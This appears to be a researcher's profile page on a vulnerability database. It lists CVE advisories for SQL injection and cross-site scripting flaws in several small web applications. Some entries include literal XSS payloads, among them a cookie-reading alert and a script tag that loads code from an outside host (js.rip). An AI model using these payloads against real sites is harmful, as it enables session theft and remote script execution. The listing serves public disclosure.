Hamdi Sevben

30 exploits Active since Feb 2023
CVE-2022-40032 NOMISEC CRITICAL WRITEUP
Simple Task Managing System 1.0 - SQL Injection via login.php Username and Password Parameters
SQL Injection vulnerability in Simple Task Managing System version 1.0 in login.php in 'username' and 'password' parameters, allows attackers to execute arbitrary code and gain sensitive information.
5 stars
CVSS 9.8
CVE-2022-40347 NOMISEC CRITICAL WORKING POC
Intern Record System 1.0 - SQL Injection via Phone/Email/DeptType/Name Parameters
SQL Injection vulnerability in Intern Record System version 1.0 in /intern/controller.php in 'phone', 'email', 'deptType' and 'name' parameters, allows attackers to execute arbitrary code and gain sensitive information.
3 stars
CVSS 9.8
CVE-2022-40348 NOMISEC MEDIUM WRITEUP
Intern Record System 1.0 - Cross-Site Scripting via Name and Email Parameters
Cross Site Scripting (XSS) vulnerability in Intern Record System version 1.0 in /intern/controller.php in 'name' and 'email' parameters, allows attackers to execute arbitrary code.
3 stars
CVSS 5.4
CVE-2023-7105 WRITEUP MEDIUM WRITEUP
E-Commerce Website 1.0 - SQL Injection via index_search.php Search Parameter
A vulnerability was found in code-projects E-Commerce Website 1.0. It has been classified as critical. Affected is an unknown function of the file index_search.php. The manipulation of the argument search leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249000.
CVSS 4.7
CVE-2023-7106 WRITEUP MEDIUM WRITEUP
E-Commerce Website 1.0 - SQL Injection via prod_id Parameter
A vulnerability was found in code-projects E-Commerce Website 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file product_details.php?prod_id=11. The manipulation of the argument prod_id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249001 was assigned to this vulnerability.
CVSS 6.3
CVE-2023-7107 WRITEUP HIGH WRITEUP
E-Commerce Website 1.0 - SQL Injection via user_signup.php Parameter Manipulation
A vulnerability was found in code-projects E-Commerce Website 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file user_signup.php. The manipulation of the argument firstname/middlename/email/address/contact/username leads to sql injection. The attack may be launched remotely. VDB-249002 is the identifier assigned to this vulnerability.
CVSS 7.3
CVE-2023-7108 WRITEUP MEDIUM WRITEUP
E-Commerce Website 1.0 - Stored Cross-Site Scripting via Firstname Parameter
A vulnerability classified as problematic has been found in code-projects E-Commerce Website 1.0. This affects an unknown part of the file user_signup.php. The manipulation of the argument firstname with the input <video/src=x onerror=alert(document.domain)> leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249003.
CVSS 4.3
CVE-2023-7109 WRITEUP HIGH WRITEUP
Library Management System 2.0 - SQL Injection via Username Parameter
A vulnerability classified as critical was found in code-projects Library Management System 2.0. This vulnerability affects unknown code of the file /admin/login.php. The manipulation of the argument username leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249004.
CVSS 7.3
CVE-2023-7110 WRITEUP HIGH WRITEUP
Library Management System 2.0 - SQL Injection via login.php Student Parameter
A vulnerability, which was classified as critical, has been found in code-projects Library Management System 2.0. This issue affects some unknown processing of the file login.php. The manipulation of the argument student leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249005 was assigned to this vulnerability.
CVSS 7.3
CVE-2023-7111 WRITEUP MEDIUM WRITEUP
Library Management System 2.0 - SQL Injection via Category Parameter
A vulnerability, which was classified as critical, was found in code-projects Library Management System 2.0. Affected is an unknown function of the file index.php. The manipulation of the argument category leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249006 is the identifier assigned to this vulnerability.
CVSS 6.3
CVE-2023-7124 WRITEUP MEDIUM WRITEUP
E-Commerce Site 1.0 - Cross-Site Scripting via search.php keyword parameter
A vulnerability, which was classified as problematic, was found in code-projects E-Commerce Site 1.0. Affected is an unknown function of the file search.php. The manipulation of the argument keyword with the input <video/src=x onerror=alert(document.cookie)> leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249096.
CVSS 4.3
CVE-2023-7126 WRITEUP MEDIUM WRITEUP
Automated Voting System 1.0 - SQL Injection via Admin Login Username Parameter
A vulnerability classified as critical has been found in code-projects Automated Voting System 1.0. This affects an unknown part of the file /admin/ of the component Admin Login. The manipulation of the argument username leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-249129 was assigned to this vulnerability.
CVSS 6.3
CVE-2023-7127 WRITEUP MEDIUM WRITEUP
Automated Voting System 1.0 - SQL Injection via Login Component
A vulnerability classified as critical was found in code-projects Automated Voting System 1.0. This vulnerability affects unknown code of the component Login. The manipulation of the argument idno leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-249130 is the identifier assigned to this vulnerability.
CVSS 6.3
CVE-2023-7128 WRITEUP MEDIUM WRITEUP
code-projects Voting System 1.0 - SQL Injection via Admin Login Username Parameter
A vulnerability, which was classified as critical, has been found in code-projects Voting System 1.0. This issue affects some unknown processing of the file /admin/ of the component Admin Login. The manipulation of the argument username leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249131.
CVSS 6.3
CVE-2023-7129 WRITEUP MEDIUM WRITEUP
code-projects Voting System 1.0 - SQL Injection via Voters Login
A vulnerability, which was classified as critical, was found in code-projects Voting System 1.0. Affected is an unknown function of the component Voters Login. The manipulation of the argument voter leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249132.
CVSS 5.5
CVE-2023-7131 WRITEUP MEDIUM WRITEUP
Intern Membership Management System 2.0 - SQL Injection via User Registration userName Parameter
A vulnerability was found in code-projects Intern Membership Management System 2.0 and classified as critical. Affected by this issue is some unknown functionality of the file /user_registration/ of the component User Registration. The manipulation of the argument userName leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-249134 is the identifier assigned to this vulnerability.
CVSS 6.3
CVE-2023-7132 WRITEUP LOW WRITEUP
Intern Membership Management System 2.0 - Stored Cross-Site Scripting via User Registration
A vulnerability was found in code-projects Intern Membership Management System 2.0. It has been classified as problematic. This affects an unknown part of the file /user_registration/ of the component User Registration. The manipulation of the argument userName/firstName/lastName/userEmail with the input "><ScRiPt>confirm(document.domain)</ScRiPt>h0la leads to cross site scripting. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249135.
CVSS 3.5
CVE-2023-7135 WRITEUP LOW WRITEUP
code-projects Record Management System 1.0 - Cross-Site Scripting via officename Parameter
A vulnerability classified as problematic has been found in code-projects Record Management System 1.0. Affected is an unknown function of the file /main/offices.php of the component Offices Handler. The manipulation of the argument officename with the input "><script src="https://js.rip/b23tmbxf49"></script> leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249138 is the identifier assigned to this vulnerability.
CVSS 2.4
CVE-2023-7136 WRITEUP LOW WRITEUP
code-projects Record Management System 1.0 - Cross-Site Scripting via docname Parameter in Document Type Handler
A vulnerability classified as problematic was found in code-projects Record Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /main/doctype.php of the component Document Type Handler. The manipulation of the argument docname with the input "><script src="https://js.rip/b23tmbxf49"></script> leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249139.
CVSS 2.4
CVE-2023-7137 WRITEUP MEDIUM WRITEUP
Client Details System 1.0 - SQL Injection via uemail Parameter
A vulnerability, which was classified as critical, has been found in code-projects Client Details System 1.0. Affected by this issue is some unknown functionality of the component HTTP POST Request Handler. The manipulation of the argument uemail leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249140.
CVSS 6.3
CVE-2023-7138 WRITEUP MEDIUM WRITEUP
Client Details System 1.0 - SQL Injection via Username Parameter in Admin Endpoint
A vulnerability, which was classified as critical, was found in code-projects Client Details System 1.0. This affects an unknown part of the file /admin of the component HTTP POST Request Handler. The manipulation of the argument username leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-249141 was assigned to this vulnerability.
CVSS 6.3
CVE-2023-7139 WRITEUP MEDIUM WRITEUP
Client Details System 1.0 - SQL Injection via HTTP POST Request Handler
A vulnerability has been found in code-projects Client Details System 1.0 and classified as problematic. This vulnerability affects unknown code of the file /admin/regester.php of the component HTTP POST Request Handler. The manipulation of the argument fname/lname/email/contact leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-249142 is the identifier assigned to this vulnerability.
CVSS 4.3
CVE-2023-7140 WRITEUP MEDIUM WRITEUP
Client Details System 1.0 - SQL Injection via /admin/manage-users.php id Parameter
A vulnerability was found in code-projects Client Details System 1.0 and classified as problematic. This issue affects some unknown processing of the file /admin/manage-users.php. The manipulation of the argument id leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249143.
CVSS 4.3
CVE-2023-7141 WRITEUP MEDIUM WRITEUP
Client Details System 1.0 - SQL Injection via uid Parameter in /admin/update-clients.php
A vulnerability was found in code-projects Client Details System 1.0. It has been classified as problematic. Affected is an unknown function of the file /admin/update-clients.php. The manipulation of the argument uid leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249144.
CVSS 4.3
CVE-2023-7142 WRITEUP MEDIUM WRITEUP
Client Details System 1.0 - SQL Injection via ID Parameter in /admin/clientview.php
A vulnerability was found in code-projects Client Details System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /admin/clientview.php. The manipulation of the argument ID leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-249145 was assigned to this vulnerability.
CVSS 4.3